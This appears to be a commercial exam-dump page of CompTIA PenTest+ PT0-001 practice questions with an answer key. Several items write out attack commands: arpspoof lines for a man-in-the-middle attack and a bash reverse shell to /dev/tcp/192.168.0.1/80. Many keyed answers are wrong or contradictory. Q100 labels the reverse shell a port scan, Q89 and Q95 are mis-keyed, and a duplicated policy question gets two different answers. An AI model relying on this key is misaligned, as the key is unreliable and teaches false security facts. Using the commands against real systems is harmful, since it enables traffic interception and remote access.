Pass Your CompTIA PenTest+ PT0-001 Exam on Jan 22, 2022 with 250 Questions [Q83-Q104]

Pass Your CompTIA PenTest+ PT0-001 Exam on Jan 22, 2022 with 250 Questions

PT0-001 Free Exam Study Guide! (Updated 250 Questions)

Job Roles Associated with CompTIA PT0-001 Exam

After passing the CompTIA PT0-001 exam, you become eligible for the PenTest+ certification. This certificate can help the IT professionals accelerate their career growth by adding the knowledge and skills that many recruiters are looking for. The certification is very valuable in terms of employment opportunities. There are several positions that you will qualify for after obtaining this certificate. Some of the job titles you can apply for include:

• Vulnerability Assessment Analyst
• Security Analyst
• Network Security Operator
• Vulnerability Tester
• Penetration Tester

Getting the CompTIA PenTest+ certification also enables you to earn a better salary. The estimated average annual income for the professionals holding this certificate amounts to $97,000. With some level of experience and additional industry-recognized certifications, you can get paid even more.

 

NEW QUESTION 83
A company requested a penetration tester review the security of an in-house-developed Android application.
The penetration tester received an APK file to support the assessment. The penetration tester wants to run SAST on the APK file. Which of the following preparatory steps must the penetration tester do FIRST?
(Select TWO)

• A. Re-sign the APK
• B. Convert JAR files to DEX
• C. Cross-compile the application
• D. Convert to JAR
• E. Decompile
• F. Attach to ADB

Answer: E

 

NEW QUESTION 84
A malicious user wants to perform an MITM attach on a computer. The computer network configuration is given below:
IP: 192.168.1.20
NETMASK: 255.255.255.0
DEFAULT GATEWAY: 192.168.1.254
DHCP: 192.168.1.253
DNS: 192.168.10.10, 192.168.20.10
Which of the following commands should the malicious user execute to perform the MITM attack?

• A. arpspoof -r -t 192 .168.1.253 192.168.1.20
• B. arpspoof -t 192.168.1.20 192.168.1.254
• C. arpspoof -c both -t 192.168.1.20 192.168.1.253
• D. arpspoof -c both -r -t 192.168.1.1 192.168.1.20

Answer: C

 

NEW QUESTION 85
A penetration tester is required to perform OSINT on staff at a target company after completing the infrastructure aspect. Which of the following would be the BEST step for penetration?

• A. Search the internet for information on staff such as social networking sites.
• B. Visit the client and use impersonation to obtain information from staff.
• C. Send spoofed emails to staff to see if staff will respond with sensitive information.
• D. Obtain staff information by calling the company and using social engineering techniques.

Answer: A

Explanation:
Explanation
Explanation/Reference: https://securitytrails.com/blog/what-is-osint-how-can-i-make-use-of-it

 

NEW QUESTION 86
When performing compliance-based assessments, which of the following is the MOST important Key consideration?

• A. Additional rate
• B. Company policy
• C. Industry type
• D. Impact tolerance

Answer: B

 

NEW QUESTION 87
Which of the following commands would allow a penetration tester to access a private network from the Internet in Metasploit?

• A. db_nmap -iL /tmp/privatehosts.txt
• B. run autoroute -s 192.168.1.0/24
• C. use auxiliary/server/socks4a
• D. set rhost 192.168.1.10

Answer: D

Explanation:
Explanation/Reference:
Reference https://www.offensive-security.com/metasploit-unleashed/pivoting/

 

NEW QUESTION 88
At the beginning of a penetration test, the tester finds a file that includes employee data, such as email addresses, work phone numbers, computers names, and office locations. The file is hosted on a public web server. Which of the following BEST describes the technique that was used to obtain this information?

• A. Enumeration of services
• B. Social engineering
• C. OSINT gathering
• D. Port scanning

Answer: C

Explanation:
Explanation/Reference:

 

NEW QUESTION 89
A client is asking a penetration tester to evaluate a new web application for availability. Which of the following types of attacks should the tester use?

• A. TCP SYN flood
• B. SQL injection
• C. XMAS scan
• D. xss

Answer: B

 

NEW QUESTION 90
A penetration tester is performing ARP spoofing against a switch. Which of the following should the penetration tester spoof to get the MOST information?

• A. MAC address of the gateway
• B. MAC address of the client
• C. MAC address of the web server
• D. MAC address of the domain controller

Answer: A

 

NEW QUESTION 91
A penetration tester reviews the scan results of a web application. Which of the following vulnerabilities is MOST critical and should be prioritized for exploitation?

• A. Clickjacking
• B. Stored XSS
• C. Fill path disclosure
• D. Expired certificate

Answer: B

Explanation:
Explanation
References https://www.owasp.org/index.php/Top_10_2010-A2-Cross-Site_Scripting_(XSS)

 

NEW QUESTION 92
A company's corporate policies state that employees are able to scan any global network as long as it is done within working hours. Government laws prohibit unauthorized scanning. Which of the following should an employee abide by?

• A. Laws supersede corporate policies
• B. Industry standards receding scanning should be followed
• C. The employee must obtain written approval from the company's Chief Information Security Officer (ClSO) prior to scanning
• D. Company policies must be followed in this situation

Answer: A

 

NEW QUESTION 93
Instructions:
Analyze the code segments to determine which sections are needed to complete a port scanning script.
Drag the appropriate elements into the correct locations to complete the script.
If at any time you would like to bring back the initial state of the simulation, please click the reset all button.
During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.

Answer:

Explanation:

 

NEW QUESTION 94
Consumer-based IoT devices are often less secure than systems built for traditional desktop computers.
Which of the following BEST describes the reasoning for this?

• A. Manufacturers developing IoT devices are less concerned with security.
• B. It is difficult for administrators to implement the same security standards across the board.
• C. Regulatory authorities often have lower security requirements for IoT systems.
• D. IoT systems often lack the hardware power required by more secure solutions.

Answer: A

 

NEW QUESTION 95
Which of the following CPU register does the penetration tester need to overwrite in order to exploit a simple butter overflow?

• A. Stack pointer register
• B. Stack base pointer
• C. Destination index register
• D. Index pointer register

Answer: A

 

NEW QUESTION 96
A penetration tester has been asked to conduct OS fingering with Nmap using a company-provided text file that contains a list of IP addresses. Which of the following are needed to conduct this scan? (Choose two.).

• A. -V
• B. -sS
• C. -O
• D. oN
• E. -iL
• F. -oX

Answer: D,E

Explanation:
Explanation
Reference
https://securitytrails.com/blog/top-15-nmap-commands-to-scan-remote-hosts#six-scan-hosts-and-ip-addresses-re

 

NEW QUESTION 97
During a penetration test a tester Identifies traditional antivirus running on the exploited server. Which of the following techniques would BEST ensure persistence in a post-exploitation phase?

• A. Modified daemons
• B. Shell binary placed in C \windowsttemp
• C. Backdoored executaWes
• D. New user creation

Answer: A

 

NEW QUESTION 98
A client has requested an external network penetration test for compliance purposes. During discussion between the client and the penetration tester, the client expresses unwillingness to add the penetration tester's source IP addresses to the client's IPS whitelist for the duration of the test. Which of the following is the BEST argument as to why the penetration tester's source IP addresses should be whitelisted?

• A. Penetration testing of third-party IPS systems often requires additional documentation and authorizations; potentially delaying the time-sensitive test.
• B. Whitelisting prevents a possible inadvertent DoS attack against the IPS and supporting log-monitoring systems.
• C. IPS whitelisting rules require frequent updates to stay current, constantly developing vulnerabilities and newly discovered weaknesses.
• D. Testing should focus on the discovery of possible security issues across all in-scope systems, not on determining the relative effectiveness of active defenses such as an IPS.

Answer: D

Explanation:
Explanation/Reference:

 

NEW QUESTION 99
Which of the following is an example of a spear phishing attack?

• A. Targeting an organization with a watering hole attack
• B. Targeting an executive with an SMS attack
• C. Targeting a specific team with an email attack
• D. Targeting random users with a USB key drop

Answer: B

 

NEW QUESTION 100
The following line was found in an exploited machine's history file. An attacker ran the following command:
bash -i >& /dev/tcp/192.168.0.1/80 0> &1
Which of the following describes what the command does?

• A. Grabs the web server's banner.
• B. Performs a port scan.
• C. Redirects a TTY to a remote system.
• D. Removes error logs for the supplied IP.

Answer: B

Explanation:
Explanation/Reference: https://hackernoon.com/reverse-shell-cf154dfee6bd

 

NEW QUESTION 101
A security consultant is trying to attack a device with a previously identified user account.

Which of the following types of attacks is being executed?

• A. Credential dump attack
• B. Reverse shell attack
• C. DLL injection attack
• D. Pass the hash attack

Answer: D

 

NEW QUESTION 102
A company's corporate policies state that employees are able to scan any global network as long as it is done within working hours. Government laws prohibit unauthorized scanning. Which of the following should an employee abide by?

• A. Industry standards regarding scanning should be followed.
• B. The employee must obtain written approval from the company's Chief Information Security Officer (CISO) prior to scanning.
• C. Company policies must be followed in this situation.
• D. Laws supersede corporate policies.

Answer: B

 

NEW QUESTION 103
Which of the following situations would cause a penetration tester to communicate with a system owner/client during the course of a test? (Select TWO)

• A. The tester discovers personally identifiable data on the system
• B. The system becomes unavailable following an attempted exploit
• C. The system shows a lack of hardening throughout
• D. The system shows evidence of prior unauthorized compromise
• E. The tester discovers a finding on an out-of-scope system

Answer: D,E

 

NEW QUESTION 104
......

Conclusion

Cybersecurity professionals are in constant demand because of the increasing numbers of data breaches and cyber-attacks. The CompTIA PenTest+ accreditation is an ultimate tool that makes one a recognized IT security tester with knowledge and skills in finding weaknesses, handling assessments, and evaluating an organization's security setup before suggesting protective and preventive measures. Prepare for the certification exam PT0-001 with the above-mentioned resources, pass it, and get ready to boost your career soon.

 

PT0-001 Dumps for CompTIA PenTest+ Certified Exam Questions & Answer: https://www.latestcram.com/PT0-001-exam-cram-questions.html